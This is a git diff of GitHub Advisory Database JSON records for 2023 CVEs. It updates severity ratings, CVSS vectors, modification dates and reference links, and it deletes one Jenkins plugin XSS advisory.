a/advisories/unreviewed/2023/05/GHSA-94hm-2957-3gcc/GHSA-94hm-2957-3gcc.json +++ b/advisories/unreviewed/2023/05/GHSA-94hm-2957-3gcc/GHSA-94hm-2957-3gcc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-94hm-2957-3gcc", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:20Z", "aliases": [ "CVE-2023-33800" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:11Z" diff --git a/advisories/unreviewed/2023/05/GHSA-c8cv-8gr5-5v2w/GHSA-c8cv-8gr5-5v2w.json b/advisories/unreviewed/2023/05/GHSA-c8cv-8gr5-5v2w/GHSA-c8cv-8gr5-5v2w.json index cadd3a25299cb..07c18ccb770fd 100644 --- a/advisories/unreviewed/2023/05/GHSA-c8cv-8gr5-5v2w/GHSA-c8cv-8gr5-5v2w.json +++ b/advisories/unreviewed/2023/05/GHSA-c8cv-8gr5-5v2w/GHSA-c8cv-8gr5-5v2w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c8cv-8gr5-5v2w", - "modified": "2023-06-02T03:30:22Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-05-27T00:30:19Z", "aliases": [ "CVE-2023-2898" @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, + { + "type": "WEB", + "url": "https://lore.kernel.org/linux-f2fs-devel/20230522124203.3838360-1-chao%40kernel.org/" + }, { "type": "WEB", "url": "https://lore.kernel.org/linux-f2fs-devel/20230522124203.3838360-1-chao@kernel.org/" @@ -47,7 +51,7 @@ "CWE-362", "CWE-476" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-26T22:15:14Z" diff --git a/advisories/unreviewed/2023/05/GHSA-fcqj-x222-4c7r/GHSA-fcqj-x222-4c7r.json b/advisories/unreviewed/2023/05/GHSA-fcqj-x222-4c7r/GHSA-fcqj-x222-4c7r.json index 60685794b633a..ba03cff6e7419 100644 --- a/advisories/unreviewed/2023/05/GHSA-fcqj-x222-4c7r/GHSA-fcqj-x222-4c7r.json +++ b/advisories/unreviewed/2023/05/GHSA-fcqj-x222-4c7r/GHSA-fcqj-x222-4c7r.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fcqj-x222-4c7r", - "modified": "2023-05-11T12:30:14Z", + "modified": "2024-01-29T21:30:25Z", "published": "2023-05-11T12:30:14Z", "aliases": [ "CVE-2023-31445" ], "details": "Cassia Access controller before 2.1.1.2203171453, was discovered to have a unprivileged -information disclosure vulnerability that allows read-only users have the ability to enumerate all other users and discover e-mail addresses, phone numbers, and privileges of all other users.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } ], "affected": [ @@ -18,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31445" }, + { + "type": "WEB", + "url": "https://blog.kscsc.online/cves/202331445/md.html" + }, { "type": "WEB", "url": "https://github.com/Dodge-MPTC/CVE-2023-31445-Unprivileged-Information-Disclosure" @@ -25,13 +32,17 @@ { "type": "WEB", "url": "https://www.cassianetworks.com" + }, + { + "type": "WEB", + "url": "https://www.swiruhack.online/cves/202331445/md.html" } ], "database_specific": { "cwe_ids": [ - + "CWE-732" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-11T12:15:09Z" diff --git a/advisories/unreviewed/2023/05/GHSA-g22j-4jxh-2vc7/GHSA-g22j-4jxh-2vc7.json b/advisories/unreviewed/2023/05/GHSA-g22j-4jxh-2vc7/GHSA-g22j-4jxh-2vc7.json index 0c855b96688c3..00601978de680 100644 --- a/advisories/unreviewed/2023/05/GHSA-g22j-4jxh-2vc7/GHSA-g22j-4jxh-2vc7.json +++ b/advisories/unreviewed/2023/05/GHSA-g22j-4jxh-2vc7/GHSA-g22j-4jxh-2vc7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g22j-4jxh-2vc7", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33796" @@ -34,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-gjqr-5qrf-53qf/GHSA-gjqr-5qrf-53qf.json b/advisories/unreviewed/2023/05/GHSA-gjqr-5qrf-53qf/GHSA-gjqr-5qrf-53qf.json index f577e45e82c1a..8edd7c44a3aec 100644 --- a/advisories/unreviewed/2023/05/GHSA-gjqr-5qrf-53qf/GHSA-gjqr-5qrf-53qf.json +++ b/advisories/unreviewed/2023/05/GHSA-gjqr-5qrf-53qf/GHSA-gjqr-5qrf-53qf.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5418" diff --git a/advisories/unreviewed/2023/05/GHSA-gp23-w687-38gc/GHSA-gp23-w687-38gc.json b/advisories/unreviewed/2023/05/GHSA-gp23-w687-38gc/GHSA-gp23-w687-38gc.json index cf6cb8e53d577..2f1539936724e 100644 --- a/advisories/unreviewed/2023/05/GHSA-gp23-w687-38gc/GHSA-gp23-w687-38gc.json +++ b/advisories/unreviewed/2023/05/GHSA-gp23-w687-38gc/GHSA-gp23-w687-38gc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gp23-w687-38gc", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33797" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-h26m-gxx2-8f39/GHSA-h26m-gxx2-8f39.json b/advisories/unreviewed/2023/05/GHSA-h26m-gxx2-8f39/GHSA-h26m-gxx2-8f39.json index b3d6cacf50c50..278246ad2359b 100644 --- a/advisories/unreviewed/2023/05/GHSA-h26m-gxx2-8f39/GHSA-h26m-gxx2-8f39.json +++ b/advisories/unreviewed/2023/05/GHSA-h26m-gxx2-8f39/GHSA-h26m-gxx2-8f39.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h26m-gxx2-8f39", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33795" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-h85c-f8f5-f6q9/GHSA-h85c-f8f5-f6q9.json b/advisories/unreviewed/2023/05/GHSA-h85c-f8f5-f6q9/GHSA-h85c-f8f5-f6q9.json index 1e8377df96699..32af5773aed2d 100644 --- a/advisories/unreviewed/2023/05/GHSA-h85c-f8f5-f6q9/GHSA-h85c-f8f5-f6q9.json +++ b/advisories/unreviewed/2023/05/GHSA-h85c-f8f5-f6q9/GHSA-h85c-f8f5-f6q9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h85c-f8f5-f6q9", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33789" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-h9jw-g3xj-5hwg/GHSA-h9jw-g3xj-5hwg.json b/advisories/unreviewed/2023/05/GHSA-h9jw-g3xj-5hwg/GHSA-h9jw-g3xj-5hwg.json index a73d330edf285..2d06e2ccedcc0 100644 --- a/advisories/unreviewed/2023/05/GHSA-h9jw-g3xj-5hwg/GHSA-h9jw-g3xj-5hwg.json +++ b/advisories/unreviewed/2023/05/GHSA-h9jw-g3xj-5hwg/GHSA-h9jw-g3xj-5hwg.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-05" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0005/" + }, { "type": "WEB", "url": "https://www.libssh.org/security/advisories/CVE-2023-2283.txt" diff --git a/advisories/unreviewed/2023/05/GHSA-hg43-j454-5m9f/GHSA-hg43-j454-5m9f.json b/advisories/unreviewed/2023/05/GHSA-hg43-j454-5m9f/GHSA-hg43-j454-5m9f.json index 3e81dfd008d54..d02bbad9885f6 100644 --- a/advisories/unreviewed/2023/05/GHSA-hg43-j454-5m9f/GHSA-hg43-j454-5m9f.json +++ b/advisories/unreviewed/2023/05/GHSA-hg43-j454-5m9f/GHSA-hg43-j454-5m9f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hg43-j454-5m9f", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:20Z", "aliases": [ "CVE-2023-33799" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:11Z" diff --git a/advisories/unreviewed/2023/05/GHSA-hwqw-p9h2-q5q4/GHSA-hwqw-p9h2-q5q4.json b/advisories/unreviewed/2023/05/GHSA-hwqw-p9h2-q5q4/GHSA-hwqw-p9h2-q5q4.json index da6232f386601..ede4a1f35063b 100644 --- a/advisories/unreviewed/2023/05/GHSA-hwqw-p9h2-q5q4/GHSA-hwqw-p9h2-q5q4.json +++ b/advisories/unreviewed/2023/05/GHSA-hwqw-p9h2-q5q4/GHSA-hwqw-p9h2-q5q4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hwqw-p9h2-q5q4", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33792" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-j2m5-w7qp-hqg7/GHSA-j2m5-w7qp-hqg7.json b/advisories/unreviewed/2023/05/GHSA-j2m5-w7qp-hqg7/GHSA-j2m5-w7qp-hqg7.json index ee3ea323b5e20..a69581a1f2499 100644 --- a/advisories/unreviewed/2023/05/GHSA-j2m5-w7qp-hqg7/GHSA-j2m5-w7qp-hqg7.json +++ b/advisories/unreviewed/2023/05/GHSA-j2m5-w7qp-hqg7/GHSA-j2m5-w7qp-hqg7.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-j2m5-w7qp-hqg7", - "modified": "2023-05-29T00:30:43Z", + "modified": "2024-02-03T09:30:17Z", "published": "2023-05-29T00:30:43Z", "aliases": [ "CVE-2023-32763" ], "details": "An issue was discovered in Qt before 5.15.15, 6.x before 6.2.9, and 6.3.x through 6.5.x before 6.5.1. When a SVG file with an image inside it is rendered, a QTextLayout buffer overflow can be triggered.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -22,16 +25,24 @@ "type": "WEB", "url": "https://codereview.qt-project.org/c/qt/qtbase/+/476125" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00028.html" + }, { "type": "WEB", "url": "https://lists.qt-project.org/pipermail/announce/2023-May/000413.html" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-03" } ], "database_specific": { "cwe_ids": [ - + "CWE-120" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-28T23:15:09Z" diff --git a/advisories/unreviewed/2023/05/GHSA-j7hm-p94x-q9pw/GHSA-j7hm-p94x-q9pw.json b/advisories/unreviewed/2023/05/GHSA-j7hm-p94x-q9pw/GHSA-j7hm-p94x-q9pw.json index 6d567c901825f..28676aa9e9801 100644 --- a/advisories/unreviewed/2023/05/GHSA-j7hm-p94x-q9pw/GHSA-j7hm-p94x-q9pw.json +++ b/advisories/unreviewed/2023/05/GHSA-j7hm-p94x-q9pw/GHSA-j7hm-p94x-q9pw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j7hm-p94x-q9pw", - "modified": "2023-05-10T15:30:19Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-05-03T12:30:41Z", "aliases": [ "CVE-2022-40302" @@ -38,7 +38,7 @@ "cwe_ids": [ "CWE-125" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-03T12:16:27Z" diff --git a/advisories/unreviewed/2023/05/GHSA-m3cx-vc9q-88c3/GHSA-m3cx-vc9q-88c3.json b/advisories/unreviewed/2023/05/GHSA-m3cx-vc9q-88c3/GHSA-m3cx-vc9q-88c3.json index 303f9d99efea3..61ed9f97ca946 100644 --- a/advisories/unreviewed/2023/05/GHSA-m3cx-vc9q-88c3/GHSA-m3cx-vc9q-88c3.json +++ b/advisories/unreviewed/2023/05/GHSA-m3cx-vc9q-88c3/GHSA-m3cx-vc9q-88c3.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5418" diff --git a/advisories/unreviewed/2023/05/GHSA-m73q-fj49-fjhp/GHSA-m73q-fj49-fjhp.json b/advisories/unreviewed/2023/05/GHSA-m73q-fj49-fjhp/GHSA-m73q-fj49-fjhp.json index 3e1b14efed0db..ad5576c783233 100644 --- a/advisories/unreviewed/2023/05/GHSA-m73q-fj49-fjhp/GHSA-m73q-fj49-fjhp.json +++ b/advisories/unreviewed/2023/05/GHSA-m73q-fj49-fjhp/GHSA-m73q-fj49-fjhp.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5418" diff --git a/advisories/unreviewed/2023/05/GHSA-mh43-3443-v7hq/GHSA-mh43-3443-v7hq.json b/advisories/unreviewed/2023/05/GHSA-mh43-3443-v7hq/GHSA-mh43-3443-v7hq.json index a079d3f83624a..3ddcf778d6fd2 100644 --- a/advisories/unreviewed/2023/05/GHSA-mh43-3443-v7hq/GHSA-mh43-3443-v7hq.json +++ b/advisories/unreviewed/2023/05/GHSA-mh43-3443-v7hq/GHSA-mh43-3443-v7hq.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5418" diff --git a/advisories/unreviewed/2023/05/GHSA-mqff-qm67-cr66/GHSA-mqff-qm67-cr66.json b/advisories/unreviewed/2023/05/GHSA-mqff-qm67-cr66/GHSA-mqff-qm67-cr66.json index eec08a274669e..df99a55e41659 100644 --- a/advisories/unreviewed/2023/05/GHSA-mqff-qm67-cr66/GHSA-mqff-qm67-cr66.json +++ b/advisories/unreviewed/2023/05/GHSA-mqff-qm67-cr66/GHSA-mqff-qm67-cr66.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5418" diff --git a/advisories/unreviewed/2023/05/GHSA-q53r-r56j-6vxp/GHSA-q53r-r56j-6vxp.json b/advisories/unreviewed/2023/05/GHSA-q53r-r56j-6vxp/GHSA-q53r-r56j-6vxp.json index 65a0218c99147..92838a4bd4a05 100644 --- a/advisories/unreviewed/2023/05/GHSA-q53r-r56j-6vxp/GHSA-q53r-r56j-6vxp.json +++ b/advisories/unreviewed/2023/05/GHSA-q53r-r56j-6vxp/GHSA-q53r-r56j-6vxp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q53r-r56j-6vxp", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33790" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-qrc7-3p69-2jpf/GHSA-qrc7-3p69-2jpf.json b/advisories/unreviewed/2023/05/GHSA-qrc7-3p69-2jpf/GHSA-qrc7-3p69-2jpf.json index e70c6b9546e10..cc13d00503cc7 100644 --- a/advisories/unreviewed/2023/05/GHSA-qrc7-3p69-2jpf/GHSA-qrc7-3p69-2jpf.json +++ b/advisories/unreviewed/2023/05/GHSA-qrc7-3p69-2jpf/GHSA-qrc7-3p69-2jpf.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5418" diff --git a/advisories/unreviewed/2023/05/GHSA-qw3p-g4v7-86mq/GHSA-qw3p-g4v7-86mq.json b/advisories/unreviewed/2023/05/GHSA-qw3p-g4v7-86mq/GHSA-qw3p-g4v7-86mq.json index cc36782decd2d..517895dcd9193 100644 --- a/advisories/unreviewed/2023/05/GHSA-qw3p-g4v7-86mq/GHSA-qw3p-g4v7-86mq.json +++ b/advisories/unreviewed/2023/05/GHSA-qw3p-g4v7-86mq/GHSA-qw3p-g4v7-86mq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qw3p-g4v7-86mq", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:27Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33785" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-vp9w-43wr-g8fj/GHSA-vp9w-43wr-g8fj.json b/advisories/unreviewed/2023/05/GHSA-vp9w-43wr-g8fj/GHSA-vp9w-43wr-g8fj.json index d598592a10d5b..3f0c57ca934f7 100644 --- a/advisories/unreviewed/2023/05/GHSA-vp9w-43wr-g8fj/GHSA-vp9w-43wr-g8fj.json +++ b/advisories/unreviewed/2023/05/GHSA-vp9w-43wr-g8fj/GHSA-vp9w-43wr-g8fj.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240202-0004/" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5480" diff --git a/advisories/unreviewed/2023/05/GHSA-vpfc-9392-2w4q/GHSA-vpfc-9392-2w4q.json b/advisories/unreviewed/2023/05/GHSA-vpfc-9392-2w4q/GHSA-vpfc-9392-2w4q.json index 1a7a6a449a8ba..52c92cd181252 100644 --- a/advisories/unreviewed/2023/05/GHSA-vpfc-9392-2w4q/GHSA-vpfc-9392-2w4q.json +++ b/advisories/unreviewed/2023/05/GHSA-vpfc-9392-2w4q/GHSA-vpfc-9392-2w4q.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5418" diff --git a/advisories/unreviewed/2023/05/GHSA-w3xh-m877-x3c2/GHSA-w3xh-m877-x3c2.json b/advisories/unreviewed/2023/05/GHSA-w3xh-m877-x3c2/GHSA-w3xh-m877-x3c2.json index 4ed8d0275ada9..8dc3c828c34a5 100644 --- a/advisories/unreviewed/2023/05/GHSA-w3xh-m877-x3c2/GHSA-w3xh-m877-x3c2.json +++ b/advisories/unreviewed/2023/05/GHSA-w3xh-m877-x3c2/GHSA-w3xh-m877-x3c2.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5418" diff --git a/advisories/unreviewed/2023/05/GHSA-wf2q-fvpq-94cc/GHSA-wf2q-fvpq-94cc.json b/advisories/unreviewed/2023/05/GHSA-wf2q-fvpq-94cc/GHSA-wf2q-fvpq-94cc.json index 9cb642520716d..e242af6db05f1 100644 --- a/advisories/unreviewed/2023/05/GHSA-wf2q-fvpq-94cc/GHSA-wf2q-fvpq-94cc.json +++ b/advisories/unreviewed/2023/05/GHSA-wf2q-fvpq-94cc/GHSA-wf2q-fvpq-94cc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wf2q-fvpq-94cc", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33794" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-wwgm-wrpv-h3h4/GHSA-wwgm-wrpv-h3h4.json b/advisories/unreviewed/2023/05/GHSA-wwgm-wrpv-h3h4/GHSA-wwgm-wrpv-h3h4.json index fc8c234442ed0..7a0b01ca630a4 100644 --- a/advisories/unreviewed/2023/05/GHSA-wwgm-wrpv-h3h4/GHSA-wwgm-wrpv-h3h4.json +++ b/advisories/unreviewed/2023/05/GHSA-wwgm-wrpv-h3h4/GHSA-wwgm-wrpv-h3h4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wwgm-wrpv-h3h4", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33798" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-x723-3x32-qg44/GHSA-x723-3x32-qg44.json b/advisories/unreviewed/2023/05/GHSA-x723-3x32-qg44/GHSA-x723-3x32-qg44.json index ea65a90e9ef93..bd23007ea718c 100644 --- a/advisories/unreviewed/2023/05/GHSA-x723-3x32-qg44/GHSA-x723-3x32-qg44.json +++ b/advisories/unreviewed/2023/05/GHSA-x723-3x32-qg44/GHSA-x723-3x32-qg44.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5418" diff --git a/advisories/unreviewed/2023/06/GHSA-23vj-5jhc-26rp/GHSA-23vj-5jhc-26rp.json b/advisories/unreviewed/2023/06/GHSA-23vj-5jhc-26rp/GHSA-23vj-5jhc-26rp.json index d6ee7bf9787f5..63b44f0440ddb 100644 --- a/advisories/unreviewed/2023/06/GHSA-23vj-5jhc-26rp/GHSA-23vj-5jhc-26rp.json +++ b/advisories/unreviewed/2023/06/GHSA-23vj-5jhc-26rp/GHSA-23vj-5jhc-26rp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-23vj-5jhc-26rp", - "modified": "2023-06-03T03:30:15Z", + "modified": "2024-02-03T09:30:17Z", "published": "2023-06-03T03:30:15Z", "aliases": [ "CVE-2023-33143" @@ -24,13 +24,17 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-33143" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-06-03T01:15:36Z" diff --git a/advisories/unreviewed/2023/06/GHSA-2rpx-x37c-9w5p/GHSA-2rpx-x37c-9w5p.json b/advisories/unreviewed/2023/06/GHSA-2rpx-x37c-9w5p/GHSA-2rpx-x37c-9w5p.json index 7f7973dd83749..e854215eb36a5 100644 --- a/advisories/unreviewed/2023/06/GHSA-2rpx-x37c-9w5p/GHSA-2rpx-x37c-9w5p.json +++ b/advisories/unreviewed/2023/06/GHSA-2rpx-x37c-9w5p/GHSA-2rpx-x37c-9w5p.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5428" diff --git a/advisories/unreviewed/2023/06/GHSA-39r8-4962-j7vg/GHSA-39r8-4962-j7vg.json b/advisories/unreviewed/2023/06/GHSA-39r8-4962-j7vg/GHSA-39r8-4962-j7vg.json deleted file mode 100644 index c9ecdc216bb28..0000000000000 --- a/advisories/unreviewed/2023/06/GHSA-39r8-4962-j7vg/GHSA-39r8-4962-j7vg.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-39r8-4962-j7vg", - "modified": "2023-06-23T15:30:41Z", - "published": "2023-06-14T15:30:37Z", - "aliases": [ - "CVE-2023-35144" - ], - "details": "Jenkins Maven Repository Server Plugin 1.10 and earlier does not escape project and build display names on the Build Artifacts As Maven Repository page, resulting in a stored cross-site scripting (XSS) vulnerability.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35144" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-2951" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/06/14/5" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-06-14T13:15:12Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/06/GHSA-3m5x-qv26-v6mr/GHSA-3m5x-qv26-v6mr.json b/advisories/unreviewed/2023/06/GHSA-3m5x-qv26-v6mr/GHSA-3m5x-qv26-v6mr.json index 710d8127e0ae2..223c2fd41cede 100644 --- a/advisories/unreviewed/2023/06/GHSA-3m5x-qv26-v6mr/GHSA-3m5x-qv26-v6mr.json +++ b/advisories/unreviewed/2023/06/GHSA-3m5x-qv26-v6mr/GHSA-3m5x-qv26-v6mr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3m5x-qv26-v6mr", - "modified": "2023-06-14T00:30:41Z", + "modified": "2024-02-03T09:30:17Z", "published": "2023-06-14T00:30:41Z", "aliases": [ "CVE-2023-33145" @@ -24,13 +24,17 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-33145" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-06-14T00:15:12Z" diff --git a/advisories/unreviewed/2023/06/GHSA-4297-fx5c-x987/GHSA-4297-fx5c-x987.json b/advisories/unreviewed/2023/06/GHSA-4297-fx5c-x987/GHSA-4297-fx5c-x987.json index 256280313816a..c07e607a1c64e 100644 --- a/advisories/unreviewed/2023/06/GHSA-4297-fx5c-x987/GHSA-4297-fx5c-x987.json +++ b/advisories/unreviewed/2023/06/GHSA-4297-fx5c-x987/GHSA-4297-fx5c-x987.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-4297-fx5c-x987", - "modified": "2023-06-26T21:31:00Z", + "modified": "2024-01-31T18:31:17Z", "published": "2023-06-26T21:31:00Z", "aliases": [ "CVE-2023-3420" ], "details": "Type Confusion in V8 in Google Chrome prior to 114.0.5735.198 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", "severity": [ - + { + "type": "CVSS_V3", + "score": 